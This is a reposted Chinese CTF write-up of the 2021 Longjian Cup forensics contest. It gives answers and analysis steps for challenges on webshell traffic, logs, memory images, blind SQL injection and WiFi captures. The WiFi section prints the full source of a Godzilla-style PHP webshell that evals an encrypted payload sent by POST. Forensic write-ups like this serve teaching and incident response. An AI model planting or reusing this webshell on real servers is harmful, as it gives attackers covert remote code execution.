碼上快樂

相關內容    簡體    繁體

2021 隴劍杯wp

本文轉載自   查看原文   2021-10-06 11:15   251    ctf

前言

這比賽應該叫應急響應比賽,而且flag交三次就不能交了,就因為我交錯一道題然后差一道進線下,氣死了。

Jwt

2.1 jwt
題目提示
2.2
搜索username得到

10087#admin
2.3 root
不是root就是admin
2.4 1.c

2.5 looter.so

2.6 /etc/pam.d/common-auth

Webshell

3.1
Admin123!@#


http.request.method == "POST" && http contains "login"
https://blog.csdn.net/qq_43431158/article/details/107176918
3.2
/var/www/html/data/Runtime/Logs/Home/21_08_07.log

3.3

www-data
3.4
1.php

3.5

frpc
3.6
192.168.239.123
3.7
0HDFt16cLQJ#JTN276Gp

日志分析

4.1 www.zip

4.2 sess_car

4.3 SplFileObject

內存分析

python ./vol.py -f Target.vmem --profile=Win7SP1x64 dumpfiles -Q 0x000000007d8c7d10 -D ./ -u

發現有關華為的東西,用volatility的dumpfiles命令dump下來,導出來改成rar后綴解壓,發現是個華為手機的備份包

然后用腳本進行解密,具體參考Huawei backup - decrypt (linkedin.com),一定要用python3.7,但不要用參考鏈接給的python3.7,有問題
實測python3.5也可以直接跑

發現還需要一個密碼,然后用volatility的lsadump命令,發現密碼

根據提示,沒有空格鍵,有下划線,W31C0M3_T0_THiS_34SY_F0R3NSiCX,然后用腳本的命令


恢復文件得到flag

簡單的日志分析

7.1
user

7.2
/Th4s_IS_VERY_Import_Fi1e


7.3


192.168.2.197:8888

SQL注入

8.1
分析日志,攻擊者在通過sql盲注來獲取flag
布爾盲注
8.2

分析sql語句的內容 select flag from sqli.flag
sqli#flag#flag
8.3
分析盲注的編號的最后一個比較 說明匹配上了

如上 最后一個字符是%7D 也就是} 向上匹配可得flag
flag{deddcd67-bcfd-487e-b940-1217e668c7db}

IOS

10.1
搜索github找到

10.2
同上

10.3


10.4
搜索select,找到流量

把192.168.1.12的流量全部提出來

因為是盲注,所以直接看盲注每一個字節的流量的最后一條
一個一個提出來:37 34 36 35 35 38 66 33 2D 63 38 34 31 2D 34 35 36 62 2D 38 35 64 37 2D 64 36 63 30 66 32 65 64 61 62 62 32 5A 5A 5A 6A
轉字符串:746558f3-c841-456b-85d7-d6c0f2edabb2ZZZj
提交不對,發現有N個Z,懷疑從Z開始就是注多了的,去掉ZZZj,提交
10.5
10-499
10.7
已知192.168.1.12被盲注,嘗試加上192.168.1.8,發現不對,查看日志文件,得到IP 172.28.0.3,不對,去wireshark尋找,找不到這個IP

嘗試搜索172.28.0.2,找到了

再嘗試提交,172.28.0.2#192.168.1.12
成功
10.8

Wifi

@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='key';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (stripos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

通過鏡像的vmep文件分析,提取出了一個壓縮包

dump下來后發現密碼提示是network adapter的guid

通過搜索注冊表得到了guid 解壓下來是一wifi密碼和ssid 在wireshark中配置一下密碼和ssid 得到一個wifi包
在wifi包中發現有哥斯拉流量 在網上搜索解密的腳本 默認配置即可 得到flag
flag{5db5b7b0bb74babb66e1522f3a6b1b12}


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 2021長安杯wp 2021 祥雲杯 wp 隴劍杯流量分析題解Writeup CTF-隴劍杯之內存分析 2021祥雲杯部分wp 2021長城杯部分wp 【wp】2021春秋杯-BabySteg wp | re | 2021祥雲杯 逆向部分 【wp】2021強網杯-ExtremelySlow 羊城杯2021-babysmc-wp
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM